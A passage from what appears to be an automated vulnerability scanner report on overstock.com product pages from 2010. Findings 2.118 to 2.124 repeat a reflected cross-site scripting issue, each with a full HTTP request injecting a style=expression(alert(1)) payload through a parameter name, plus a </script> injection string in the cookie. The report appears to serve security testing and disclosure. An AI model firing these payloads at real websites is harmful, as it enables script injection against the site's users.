Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3906673|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:48 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:48 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Za
...[SNIP]...
<input type="hidden" name="7251a"style="x:expression(alert(1))"9cd48544d0e" value="1"/>
...[SNIP]...

2.118. http://www.overstock.com/Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 742a2"style="x:expression(alert(1))"7ddfdf958c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html?742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:49 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:49 GMT; Path=/
Set-Cookie: mxcproclicks=3930811|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408809774:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=21
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107243

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="742a2"style="x:expression(alert(1))"7ddfdf958c9" value="1"/>
...[SNIP]...

2.119. http://www.overstock.com/Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8740e"style%3d"x%3aexpression(alert(1))"f06280582af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8740e"style="x:expression(alert(1))"f06280582af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html?8740e"style%3d"x%3aexpression(alert(1))"f06280582af=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:44 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:44 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404964793:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:44 GMT; Path=/
Set-Cookie: mxcproclicks=5075179|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:44 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104199

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>CH
...[SNIP]...
<input type="hidden" name="8740e"style="x:expression(alert(1))"f06280582af" value="1"/>
...[SNIP]...

2.120. http://www.overstock.com/Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c529d"style="x:expression(alert(1))"2dc1a013a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html?c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:53 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404973630:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2869430|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:53 GMT; Path=/
Keep-Alive: timeout=5, max=57
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Cu
...[SNIP]...
<input type="hidden" name="c529d"style="x:expression(alert(1))"2dc1a013a42" value="1"/>
...[SNIP]...

2.121. http://www.overstock.com/Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705fb"style%3d"x%3aexpression(alert(1))"5454126871a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 705fb"style="x:expression(alert(1))"5454126871a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html?705fb"style%3d"x%3aexpression(alert(1))"5454126871a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:06 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:06 GMT; Path=/
Set-Cookie: mxcproclicks=4123486|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:06 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404986587:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="705fb"style="x:expression(alert(1))"5454126871a" value="1"/>
...[SNIP]...

2.122. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dd41"style="x:expression(alert(1))"45e65c86e48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html?2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:45 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404965520:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4061543|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108038

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="2dd41"style="x:expression(alert(1))"45e65c86e48" value="1"/>
...[SNIP]...

2.123. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf583"style="x:expression(alert(1))"e78249b5e41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html?cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:49 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404968974:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4565140|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:49 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:49 GMT; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="cf583"style="x:expression(alert(1))"e78249b5e41" value="1"/>
...[SNIP]...

2.124. http://www.overstock.com/Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 911db"style="x:expression(alert(1))"d7e35dfcee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html?911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:39 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1534477|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408799824:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Fa
